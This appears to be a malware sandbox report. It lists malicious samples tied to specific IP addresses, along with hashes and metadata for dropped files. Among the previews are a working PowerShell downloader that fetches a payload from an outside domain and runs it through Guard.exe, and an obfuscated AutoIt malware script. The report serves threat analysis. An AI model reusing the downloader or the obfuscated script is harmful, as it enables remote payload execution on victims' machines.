                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              FREE-NET-ASFREEnetEUlKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              jqplot.htaGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.112.248
                                                                                              KNkr78hyig.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                              • 147.45.113.159
                                                                                              Tsy9P2T9yF.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159
                                                                                              kGxQbLOG7s.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                                                              • 147.45.113.159
                                                                                              q79Pocl81P.exeGet hashmaliciousCryptbotBrowse
                                                                                              • 147.45.113.159
                                                                                              fnuFOEqg4j.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159
                                                                                              ob4eL9Z1O4.exeGet hashmaliciousCryptbotBrowse
                                                                                              • 147.45.113.159
                                                                                              S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159
                                                                                              EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0elKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                              • 147.45.49.155
                                                                                              DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                              • 147.45.49.155
                                                                                              Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 147.45.49.155
                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 147.45.49.155
                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 147.45.49.155
                                                                                              setup.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 147.45.49.155
                                                                                              Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 147.45.49.155
                                                                                              medicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 147.45.49.155
                                                                                              winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                              • 147.45.49.155
                                                                                              37f463bf4616ecd445d4a1937da06e19lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                              • 147.45.49.155
                                                                                              gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                              • 147.45.49.155
                                                                                              Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 147.45.49.155
                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                              • 147.45.49.155
                                                                                              9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                              • 147.45.49.155
                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                              • 147.45.49.155
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\Public\Guard.exelKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                  R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                    s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                      PkContent.exeGet hashmaliciousUnknownBrowse
                                                                                                        PkContent.exeGet hashmaliciousUnknownBrowse
                                                                                                          ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                                                            ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                                                              EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                                                                                                RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7ef60c72, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):0.6586378485438219
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Jaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                  MD5:DD847F5F29AF4CBC3EA965D9FA210C67
                                                                                                                  SHA1:B566D479A9ADD8DDDCC2B3D2A2F7C8962C8F23E0
                                                                                                                  SHA-256:F5F9E884571C6858C5DAF7C0E1810B08F71CEB06ACDB6C707C27FC7F220C487C
                                                                                                                  SHA-512:9F9F33FF4568DADBCADF55B5BADF58798807B53A0FB2EC4B71A25C290D596F29CF7F5BE661D287222ADCB449EA15CDB2C325EE5E697AFADB421687C61A4D36B2
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):893608
                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: lKin1m7Pf2.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: R4qP4YM0QX.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: R8CAg00Db8.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: s4PymYGgSh.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                                                  • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                                                  • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                                                                                  • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                                                                                  Process:C:\Users\user\AppData\Roaming\rMpqCJnPv.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):491
                                                                                                                  Entropy (8bit):5.166492835261717
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:fZAAFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:fKACknZ9LzjYnRSb8Cba
                                                                                                                  MD5:2ED71B6F36E471DD1716AC1B95B37818
                                                                                                                  SHA1:5F58BF987993109327440BD3ACBA1533BA79E8F8
                                                                                                                  SHA-256:371769C966E7940C3E103B9873EFA3BF5101DF2ABDAF4741929EF1634EF09913
                                                                                                                  SHA-512:7532BE0B54A6BB304E7AE511667B05DAE173F48E8E645A1FEB21CFBDBA1BAFBB6854660E3672D46CCF2B0900BBACB90CE1BA20C30D88DB9ECADDD8904D1C4967
                                                                                                                  Malicious:true
                                                                                                                  Preview:[string]$fU5L = "https://tiffany-careers.com/ygUmFny.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1151623
                                                                                                                  Entropy (8bit):5.198520105522575
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:28V+jcfSygd6pMMrD3UYhU1FPCuY23OvAnzz/v3ptwcd:qcyUpMuePTX5VtwC
                                                                                                                  MD5:D4C241246F16C01DA842EDE791D91CA9
                                                                                                                  SHA1:53411935B6476CB4375D3CEA49C86615B706BDBA
                                                                                                                  SHA-256:A59A8A7120E4293622DC956255F5928FCAC30916961F97A4425D6B88D051205F
                                                                                                                  SHA-512:F70E9E5BE162EEB557A79C3EE98CC43AE96971EA501F7AD3C004D583C2F1531AC02587E3B8CC3891A5E0F34BF6A194D5D3D0F49791F04698EFF561801A30896B
                                                                                                                  Malicious:true
                                                                                                                  Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):508
                                                                                                                  Entropy (8bit):5.060441263911329
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:YH/um3RA8sqjHRsBdOg2HHQOcaq3QYiubxnP7E4TfF+:Y2sRdsWCdMHa3QYhbxP7np+
                                                                                                                  MD5:A4D2A3B942F69D80CFB36FBCC2500914
                                                                                                                  SHA1:938422820071B95343A84F52D9F8E63A167C694F
                                                                                                                  SHA-256:9FF771E0839C54ED699EE1B69D30DFB5CCCCC3CCF848404607B70D50A951DE30
                                                                                                                  SHA-512:6824B0FAD32AAC16D6965B842C5A8021FFF89F53D7672F33CEEB376E4C4544EDFEA283735F692969A63ACBC0407D40CEDA14CF7A6975049A944D4F2A419A1F9D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379494319267265","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":584053},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):508
                                                                                                                  Entropy (8bit):5.047195090775108
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                                  MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                                  SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                                  SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                                  SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65110
                                                                                                                  Entropy (8bit):4.0960479354974
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:u0eDil7wkRKfCqzmbeE/kh1B1Qn/0CjVQe0yZHvxUli:GA7wyCNSiE/kh1Bc/0Cj4yZJ7
                                                                                                                  MD5:AD103A90F30942B861F8499BF5C68CB9
                                                                                                                  SHA1:4C70481637E46F4E61CDBF46E8ACB05FB31AB263
                                                                                                                  SHA-256:F4DE33405E2771BA2C8FD2E0378453815CE0F3732CC624C5D163060616172389
                                                                                                                  SHA-512:0E14321DB45729D7D11D6DB505C75F50B71CE6036A91C3E18DD988CD1A43CA90DDC592F739C1170F1BA4521AE2702A1144912B77E805B9220F77EB196C05326B
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:Certificate, Version=3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1391
                                                                                                                  Entropy (8bit):7.705940075877404
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):192
                                                                                                                  Entropy (8bit):2.7353301697871597
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:kkFklZeLkN/XfllXlE/HT8k7zvNNX8RolJuRdxLlGB9lQRYwpDdt:kKt9T8wpNMa8RdWBwRd
                                                                                                                  MD5:BBE1B11BD0AE1FFC24D3E6C560916513
                                                                                                                  SHA1:3A2DEF4D8571459314E2234385E7C36F32FC0BB5
                                                                                                                  SHA-256:0097AD2F06521F6F12DE61506189A4AFD1959B6FF797D8429FDD9B98B8FBED7E
                                                                                                                  SHA-512:3431B057A638E7E47834A801C7194608A469C2C9CC385BC34B928611B1A2C176A1C6190E1EA5B59152FA9E03ADAE28A2F9C211407ED221F92DD8D078106B0A90
                                                                                                                  Malicious:false
                                                                                                                  Preview:p...... .............U..(....................................................... ..........W....=...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1233
                                                                                                                  Entropy (8bit):5.233980037532449
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10880
                                                                                                                  Entropy (8bit):5.214360287289079
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                                  MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                                  SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                                  SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                                  SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):295
                                                                                                                  Entropy (8bit):5.362047569096434
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJM3g98kUwPeUkwRe9:YvXKXFwY/J0YpW7v8GMbLUkee9
                                                                                                                  MD5:ED8917C1C273D9C264A665863A276C42
                                                                                                                  SHA1:CB28898649CE7CDF1271732F20C4AF04F6AE0383
                                                                                                                  SHA-256:D115EA22E5FFB9452090640E9CB7AF22B5C96F5BF9D3B3AF42DC182E617E910A
                                                                                                                  SHA-512:D8FDDC879ED5826BD631FF88EBC50BB361B13DDE9FE827C7319E71531DBE63558B6A2340E5B2C6DBCADC8FF58F35FD68C36FCF409D0BAF502E54378684D06A07
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):294
                                                                                                                  Entropy (8bit):5.301359973341853
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfBoTfXpnrPeUkwRe9:YvXKXFwY/J0YpW7v8GWTfXcUkee9
                                                                                                                  MD5:392CA2A56F53325914C960DA4F31472A
                                                                                                                  SHA1:6C0CF0253DAB04597853D22C97B17D54FD7E974B
                                                                                                                  SHA-256:9F696D97DFC2BE6D40B6969DC2A5DA7066412E824DB7BA1A5EFDCA6E27E2C07C
                                                                                                                  SHA-512:1610287168E4391D865A9530A43C861FA830450D69C7080C7E5AA8A6D3CFEF108DAF1B4A69291F5446C484444FE5A53CD7BC73C8786E020CA3262ED94A951371
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):294
                                                                                                                  Entropy (8bit):5.27961946869966
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfBD2G6UpnrPeUkwRe9:YvXKXFwY/J0YpW7v8GR22cUkee9
                                                                                                                  MD5:4C1464B9BBCCFC13DC3500C420B1EE10
                                                                                                                  SHA1:E728738E6269B68376FC200A47767C35D779A514
                                                                                                                  SHA-256:2F5C48B10856586F0CF93DECE446B431147320687434DB3802596C6AB5297F7C
                                                                                                                  SHA-512:0249B3086843BF67E3036ACBD94CC88F18D4079758638DC1EE4CE59C6C8126E61E48A52C0359CF068F471D6ED6BC453CD4DF19FDB0C5449378093AD21157B76B
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):285
                                                                                                                  Entropy (8bit):5.340894277725081
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJfPmwrPeUkwRe9:YvXKXFwY/J0YpW7v8GH56Ukee9
                                                                                                                  MD5:044340EA2F7C00D6D971E0ABAD106265
                                                                                                                  SHA1:65D59661367D7F073D4468D4B52AD6994358294A
                                                                                                                  SHA-256:BC9D09D2888EA8B999E470A29880F40EA6B7FB45FAC1B8E47C90B4BD42F40BB9
                                                                                                                  SHA-512:1DA6D071B17A0F2A23C0737A97F06ADDB2674F549460DF30C1232F8CC03B01DDDED86D1BC79C26FC16FEE887F62D02712C967BEB614F15DAE45785338276854E
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1123
                                                                                                                  Entropy (8bit):5.691590806235584
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:Yv6XjBliBpLgE9cQx8LennAvzBvkn0RCmK8czOCCSZ:Yv0BMBhgy6SAFv5Ah8cv/Z
                                                                                                                  MD5:79BECD4D9429BF4248C226E011B094A4
                                                                                                                  SHA1:6513A99726E834302AF033424D0A7FC7D3002E60
                                                                                                                  SHA-256:B702D236C001F4356D50968F758346D00A8710B8ED7312796BC563ECB95418E2
                                                                                                                  SHA-512:98B2AEA182E4E7AF4FBFA42DC353AABA125BE9F41AE0BDB37C17A5D6A92B926A0719CE2EF05F06613CBB5BE0611A75CB0CFCAA44E22DE4FB6EA60511751ED6E5
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"analyticsData":{"responseGUID":"27f2b6e1-61c6-42f8-87bc-5d2d7b58b9ab","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1735108229443,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):289
                                                                                                                  Entropy (8bit):5.286547477331463
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:YEQXJ2HXFSD5i/z+0HR+FIbRI6XVW7+0YezoAvJf8dPeUkwRe9:YvXKXFwY/J0YpW7v8GU8Ukee9
                                                                                                                  MD5:F4F0511D0909BC85DFC4379179DD1E84
                                                                                                                  SHA1:E30ECEAC2EE34E72B865CF404FDA3F9BD6651AB5
                                                                                                                  SHA-256:554F4F4D781F33096B517146019BDA47A116536196DB04ED301BFA4622B9DC18
